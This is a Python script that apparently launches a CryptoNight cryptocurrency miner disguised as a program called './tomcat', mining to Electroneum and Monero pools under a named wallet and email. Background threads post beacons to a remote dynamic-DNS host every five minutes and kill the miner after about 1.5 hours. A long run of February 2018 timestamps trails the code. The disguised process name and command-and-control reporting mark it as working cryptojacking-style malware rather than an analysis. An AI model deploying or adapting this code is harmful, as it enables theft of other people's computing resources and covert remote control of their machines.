import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:19:05.330747
#2018-02-17 16:07:04.107979
#2018-02-17 17:54:07.245710
#2018-02-17 19:43:03.455423
#2018-02-17 21:30:06.924014
#2018-02-17 23:16:01.716272
#2018-02-18 01:02:08.118866
#2018-02-18 02:50:03.856516
#2018-02-18 04:39:06.831487
#2018-02-18 06:31:04.493930
#2018-02-18 08:18:08.238567
#2018-02-18 10:06:02.167358
#2018-02-18 11:52:01.447851
#2018-02-18 13:37:04.058987
#2018-02-18 15:27:01.804008
#2018-02-18 17:16:04.919931
#2018-02-18 19:04:03.772817
#2018-02-18 20:51:01.272711
#2018-02-18 22:38:07.485372
#2018-02-19 00:27:06.776019
#2018-02-19 02:13:06.784327
#2018-02-19 04:02:03.653881
#2018-02-19 05:46:04.519803
#2018-02-19 07:36:01.726646
#2018-02-19 09:25:03.928870
#2018-02-19 11:14:01.660412
#2018-02-19 13:02:07.244460
#2018-02-19 14:51:01.899615
#2018-02-19 16:39:01.881707
#2018-02-19 18:26:04.105768
#2018-02-19 20:11:06.891393
#2018-02-19 22:01:07.766797
#2018-02-19 23:46:07.016173
#2018-02-20 01:33:04.203737
#2018-02-20 03:20:07.192161
#2018-02-20 05:06:07.738340
#2018-02-20 06:49:06.741050
#2018-02-20 08:35:08.040260
#2018-02-20 10:19:01.399530
#2018-02-20 12:04:06.288020
#2018-02-20 13:51:03.992446
#2018-02-20 15:36:09.504477
#2018-02-20 17:21:08.322968
#2018-02-20 19:10:03.259769
#2018-02-20 20:58:07.044888
#2018-02-20 22:42:07.488878
#2018-02-21 00:25:05.283092
#2018-02-21 02:11:04.388617
#2018-02-21 03:57:05.214817
#2018-02-21 05:44:07.402090
#2018-02-21 07:32:08.096578
#2018-02-21 09:17:01.556190
#2018-02-21 11:05:04.670308
#2018-02-21 12:52:07.321462
#2018-02-21 14:41:04.370124
#2018-02-21 16:27:10.794206
#2018-02-21 18:17:04.996474
#2018-02-21 20:02:09.195138
#2018-02-21 21:50:09.241126
#2018-02-21 23:36:08.186777
#2018-02-22 01:25:09.026704
#2018-02-22 03:14:01.869221
#2018-02-22 05:01:04.163194
#2018-02-22 06:44:06.196863
#2018-02-22 08:33:02.138045
#2018-02-22 10:20:05.785434
#2018-02-22 12:04:07.697104
#2018-02-22 13:49:10.485414
#2018-02-22 15:37:08.439645
#2018-02-22 17:23:02.085952
#2018-02-22 19:11:08.149404
#2018-02-22 21:03:04.087406
#2018-02-22 22:47:01.670958
#2018-02-23 00:34:08.208790
#2018-02-23 02:22:04.050882
#2018-02-23 04:12:01.936292
#2018-02-23 05:56:06.546907
#2018-02-23 07:46:01.923478
#2018-02-23 09:50:07.850600
#2018-02-23 11:55:06.455996
#2018-02-23 13:43:02.200307
#2018-02-23 15:16:06.948906
#2018-02-23 16:51:04.961187
#2018-02-23 18:22:06.680843
#2018-02-23 19:53:08.166938
#2018-02-23 21:24:07.163554
#2018-02-23 23:01:07.720126
#2018-02-24 00:41:01.417260
#2018-02-24 02:23:01.784537
#2018-02-24 03:55:03.224774
#2018-02-24 05:21:07.421471
#2018-02-24 06:59:04.846621
#2018-02-24 08:32:01.376310
#2018-02-24 10:06:05.088149
#2018-02-24 11:50:06.252159
#2018-02-24 13:17:07.359119
#2018-02-24 14:49:04.361957
#2018-02-24 16:21:01.243900
#2018-02-24 17:57:07.157069
#2018-02-24 19:25:09.451236
#2018-02-24 22:16:04.211729
#2018-02-25 02:28:06.336803
#2018-02-25 06:08:01.835178
#2018-02-25 11:38:07.461852